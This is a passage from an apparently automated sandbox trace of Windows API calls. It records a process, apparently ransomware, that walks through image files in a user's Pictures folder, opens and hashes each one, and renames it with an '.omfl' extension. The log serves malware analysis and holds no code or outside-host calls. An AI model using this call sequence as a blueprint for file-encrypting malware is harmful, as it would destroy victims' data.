[0133.983] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0133.983] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11874eb0, ftCreationTime.dwHighDateTime=0x1d5defd, ftLastAccessTime.dwLowDateTime=0xe7040bc0, ftLastAccessTime.dwHighDateTime=0x1d5dfbe, ftLastWriteTime.dwLowDateTime=0xe7040bc0, ftLastWriteTime.dwHighDateTime=0x1d5dfbe, nFileSizeHigh=0x0, nFileSizeLow=0x376f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dUR2tmVG -wyf.jpg", cAlternateFileName="DUR2TM~1.JPG")) returned 1 [0133.983] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\dUR2tmVG -wyf.jpg") returned=".jpg" [0133.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\dUR2tmVG -wyf.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\dur2tmvg -wyf.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.984] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=14191) returned 1 [0133.984] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.987] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.988] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.988] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.988] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.988] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.988] GetLastError () returned 0x0 [0133.988] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.988] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.989] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.989] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.989] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.989] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\dUR2tmVG -wyf.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\dur2tmvg -wyf.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\dUR2tmVG -wyf.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\dur2tmvg -wyf.jpg.omfl")) returned 1 [0133.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.990] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.991] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0133.992] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0628c50, ftCreationTime.dwHighDateTime=0x1d5dbeb, ftLastAccessTime.dwLowDateTime=0x327e2e60, ftLastAccessTime.dwHighDateTime=0x1d5d893, ftLastWriteTime.dwLowDateTime=0x327e2e60, ftLastWriteTime.dwHighDateTime=0x1d5d893, nFileSizeHigh=0x0, nFileSizeLow=0x10c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="icKCFE ZzI.bmp", cAlternateFileName="ICKCFE~1.BMP")) returned 1 [0133.992] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\icKCFE ZzI.bmp") returned=".bmp" [0133.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\icKCFE ZzI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\ickcfe zzi.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.992] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=4292) returned 1 [0133.992] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.996] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.997] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.997] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.997] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.997] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.997] GetLastError () returned 0x0 [0133.997] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.997] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.997] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.997] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.997] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.998] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\icKCFE ZzI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\ickcfe zzi.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\icKCFE ZzI.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\ickcfe zzi.bmp.omfl")) returned 1 [0133.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.999] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.000] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2512730, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x83535400, ftLastAccessTime.dwHighDateTime=0x1d5d82a, ftLastWriteTime.dwLowDateTime=0x83535400, ftLastWriteTime.dwHighDateTime=0x1d5d82a, nFileSizeHigh=0x0, nFileSizeLow=0xc8bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kpeJyVodB3fW.gif", cAlternateFileName="KPEJYV~1.GIF")) returned 1 [0134.000] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kpeJyVodB3fW.gif") returned=".gif" [0134.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kpeJyVodB3fW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kpejyvodb3fw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.001] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=51391) returned 1 [0134.001] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.004] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.005] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.005] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.005] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.005] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.005] GetLastError () returned 0x0 [0134.005] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.005] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.005] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.005] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.006] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.006] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.007] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kpeJyVodB3fW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kpejyvodb3fw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kpeJyVodB3fW.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kpejyvodb3fw.gif.omfl")) returned 1 [0134.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.008] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.009] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e7fff40, ftCreationTime.dwHighDateTime=0x1d5e3b0, ftLastAccessTime.dwLowDateTime=0xd12db30, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0xd12db30, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x10d4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kssCe821.jpg", cAlternateFileName="")) returned 1 [0134.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kssCe821.jpg") returned=".jpg" [0134.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kssCe821.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kssce821.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.009] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68939) returned 1 [0134.009] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.013] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.014] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.014] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.014] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.014] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.014] GetLastError () returned 0x0 [0134.014] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.014] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.015] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.015] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.015] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.016] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kssCe821.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kssce821.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\kssCe821.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\kssce821.jpg.omfl")) returned 1 [0134.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.017] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.018] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe45ba530, ftCreationTime.dwHighDateTime=0x1d5e0c8, ftLastAccessTime.dwLowDateTime=0x30ba2150, ftLastAccessTime.dwHighDateTime=0x1d5dda3, ftLastWriteTime.dwLowDateTime=0x30ba2150, ftLastWriteTime.dwHighDateTime=0x1d5dda3, nFileSizeHigh=0x0, nFileSizeLow=0x173d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mrDXK2lMtUfVT9I5H9Q.png", cAlternateFileName="MRDXK2~1.PNG")) returned 1 [0134.018] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\mrDXK2lMtUfVT9I5H9Q.png") returned=".png" [0134.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\mrDXK2lMtUfVT9I5H9Q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\mrdxk2lmtufvt9i5h9q.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.018] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=95193) returned 1 [0134.019] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.022] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.023] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.023] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.023] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.023] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.023] GetLastError () returned 0x0 [0134.024] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.024] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.024] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.024] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.024] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.026] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\mrDXK2lMtUfVT9I5H9Q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\mrdxk2lmtufvt9i5h9q.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\mrDXK2lMtUfVT9I5H9Q.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\mrdxk2lmtufvt9i5h9q.png.omfl")) returned 1 [0134.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.026] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.026] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.028] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4015c8c0, ftCreationTime.dwHighDateTime=0x1d5dc0e, ftLastAccessTime.dwLowDateTime=0x35e179f0, ftLastAccessTime.dwHighDateTime=0x1d5deaf, ftLastWriteTime.dwLowDateTime=0x35e179f0, ftLastWriteTime.dwHighDateTime=0x1d5deaf, nFileSizeHigh=0x0, nFileSizeLow=0x14838, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pjUhcmFM1gbFX2sQmK.gif", cAlternateFileName="PJUHCM~1.GIF")) returned 1 [0134.028] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\pjUhcmFM1gbFX2sQmK.gif") returned=".gif" [0134.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\pjUhcmFM1gbFX2sQmK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\pjuhcmfm1gbfx2sqmk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.028] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=84024) returned 1 [0134.028] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.032] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.033] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.033] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.033] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.033] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.033] GetLastError () returned 0x0 [0134.033] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.033] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.033] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.033] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.034] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.035] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\pjUhcmFM1gbFX2sQmK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\pjuhcmfm1gbfx2sqmk.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\pjUhcmFM1gbFX2sQmK.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\pjuhcmfm1gbfx2sqmk.gif.omfl")) returned 1 [0134.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.036] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0134.037] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e7fac0, ftCreationTime.dwHighDateTime=0x1d5d86b, ftLastAccessTime.dwLowDateTime=0xd7a77220, ftLastAccessTime.dwHighDateTime=0x1d5e6b2, ftLastWriteTime.dwLowDateTime=0xd7a77220, ftLastWriteTime.dwHighDateTime=0x1d5e6b2, nFileSizeHigh=0x0, nFileSizeLow=0x2867, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QImRpoeP_o_7M.bmp", cAlternateFileName="QIMRPO~1.BMP")) returned 1 [0134.037] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\QImRpoeP_o_7M.bmp") returned=".bmp" [0134.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\QImRpoeP_o_7M.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\qimrpoep_o_7m.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.037] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=10343) returned 1 [0134.038] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.041] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.042] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.042] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.042] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.042] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.042] GetLastError () returned 0x0 [0134.042] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.042] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.042] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.042] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.042] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.043] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\QImRpoeP_o_7M.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\qimrpoep_o_7m.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 